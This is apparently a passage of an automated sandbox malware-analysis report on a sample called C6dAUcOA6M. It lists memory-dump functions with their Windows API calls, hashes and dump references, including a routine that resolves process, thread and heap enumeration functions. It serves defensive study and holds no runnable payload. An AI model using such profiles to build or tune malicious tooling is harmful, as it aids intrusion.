                                                                                                                                                                                                                                                                                                                                                      • timeSetEvent.WINMM(00002710,00000000,02D1C350,00000000,00000001), ref: 02D1C36C
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Eventtime
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2982266575-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 3adfcfa9150808cbab61505282972247a4b496945bce3af7131c98fc36dc7026
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ca704b4043a04d2af995805ae9afc270abb81f11c5782ed80aaa5715a4b773db
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3adfcfa9150808cbab61505282972247a4b496945bce3af7131c98fc36dc7026
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01C048B27E03003AFA50A6AA6C82F27569D9705B50F500416F704EA2C2D2A269605E68
                                                                                                                                                                                                                                                                                                                                                      Function 02CF4C38 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02CF4C3F
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: AllocString
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2525500382-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 79605fd24afb79261f484944138f91629c85160d246f4b866e7be584bee5fd18
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58B0123520860155FAFC27A30F00733004D1BC0286F892052DF18C80E0FB41C101D836
                                                                                                                                                                                                                                                                                                                                                      Function 02CF4C50 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 02CF4C57
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: FreeString
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3341692771-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 5bfb5a6a1e366ebb2b2eebf54506e86852a37438f5748f99b8b91dfe542061cb
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55A011A8000A028A8AEA23A8002002B2A322EC0200388C0A883000A0028A2A8000A820
                                                                                                                                                                                                                                                                                                                                                      Function 02CF15CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02CF1A03,?,02CF1FC1), ref: 02CF15E2
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 1e059180b5e1949c67567a15b0d34a0ac79ceb576875e084ed292af76cad4348
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 1137a735d8dd0409d772eecf216b59b0e9b0bdfaeee6d7350792c4655ce95e27
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e059180b5e1949c67567a15b0d34a0ac79ceb576875e084ed292af76cad4348
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DCF049F0B413008FDB8ACFB999403017BF2E78A345F648579D609DB398F7B988058B80
                                                                                                                                                                                                                                                                                                                                                      Function 02CF1682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02CF1FC1), ref: 02CF16A4
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: cd27bb8eae025994ff5879e9edb3da3eabbf841515801d953bd62d2534f147e2
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ee7e25b1af0166822e3b7418dae8b6fb172c723f46382741f1e8c44974a143a5
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cd27bb8eae025994ff5879e9edb3da3eabbf841515801d953bd62d2534f147e2
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84F0BEB2B40B95ABD7509F5E9C80B82BB98FB50365F090139FA0C9B740E7B4EC148BD4
                                                                                                                                                                                                                                                                                                                                                      Function 02CF16E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02CF1FE4), ref: 02CF1704
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 1a737b6a96702931abf6b80eeb85abd87ed5d1451c13553ea40258b7130bc81b
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 5cedcec98a7425aa6516c4731c93cd668771cac835f222c4fbc4226c5c0d2860
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a737b6a96702931abf6b80eeb85abd87ed5d1451c13553ea40258b7130bc81b
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3E08675300301EFD7905A7E5D407126BDCEB54664F194476F709DB241D2E0E8148B60

                                                                                                                                                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                                                                                                                                                      Function 02D0AB1C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02D0ADA3,?,?,02D0AE35,00000000,02D0AF11), ref: 02D0AB30
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02D0AB48
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02D0AB5A
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02D0AB6C
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02D0AB7E
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02D0AB90
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02D0ABA2
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02D0ABB4
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02D0ABC6
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02D0ABD8
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02D0ABEA
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02D0ABFC
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02D0AC0E
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02D0AC20
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02D0AC32
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02D0AC44
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02D0AC56
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                                                                                                      • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 667068680-597814768
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 1c5e8962ab034a86bc23bfdd683a8090cee0c40ad886fbff6c826cf854715b3a
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 83fcdad62c6e1a8af3c887400f622032073ec0c7018a62236fb39f5e03547761
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c5e8962ab034a86bc23bfdd683a8090cee0c40ad886fbff6c826cf854715b3a
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9331EAF0A80350AFFF80EBB4E8C5B2977A9AB15701B100D65AA12CF354F678AC18DF15
                                                                                                                                                                                                                                                                                                                                                      Function 02CF5908 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,02CF6C14,02CF0000,02D1E790), ref: 02CF5925
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02CF593C
                                                                                                                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(?,?,?), ref: 02CF596C
                                                                                                                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02CF6C14,02CF0000,02D1E790), ref: 02CF59D0
                                                                                                                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02CF6C14,02CF0000,02D1E790), ref: 02CF5A06
                                                                                                                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02CF6C14,02CF0000,02D1E790), ref: 02CF5A19
                                                                                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02CF6C14,02CF0000,02D1E790), ref: 02CF5A2B
                                                                                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02CF6C14,02CF0000,02D1E790), ref: 02CF5A37
                                                                                                                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02CF6C14,02CF0000), ref: 02CF5A6B
                                                                                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02CF6C14), ref: 02CF5A77
                                                                                                                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02CF5A99
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                      • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3245196872-1565342463
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 993b908ff8286f29a0496f01dc4f6b954e5938ece7043c0edf9988baf601ff8a
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 5b7e75722dce002d6a06d711b722e0ec6e1f65a7f2122fdcf5e9c04d7e4815a1
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 993b908ff8286f29a0496f01dc4f6b954e5938ece7043c0edf9988baf601ff8a
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D416E71E40219AFDB90DBE8CC88AEEB3BDAF48390F4445A5A748E7241E7709B44DF50
                                                                                                                                                                                                                                                                                                                                                      Function 02CF5BD8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02CF5BE8
                                                                                                                                                                                                                                                                                                                                                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02CF5BF5
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02CF5BFB
                                                                                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02CF5C26
                                                                                                                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02CF5C6D
                                                                                                                                                                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02CF5C7D
                                                                                                                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02CF5CA5
                                                                                                                                                                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02CF5CB5
                                                                                                                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02CF5CDB
                                                                                                                                                                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02CF5CEB
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                                                                                                                                                                                                                                      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1599918012-2375825460
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 73718c86ee54e08eb153eddf1eec6974abbd1f219e2b03c2b09b0cac79daee21
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4731B571E0066C6AEBE5DAF48C45FDE77ED9B443C0F4401A19709E6080D6B59B848FA0
                                                                                                                                                                                                                                                                                                                                                      Function 02CF7FD4 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02CF7FF5
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
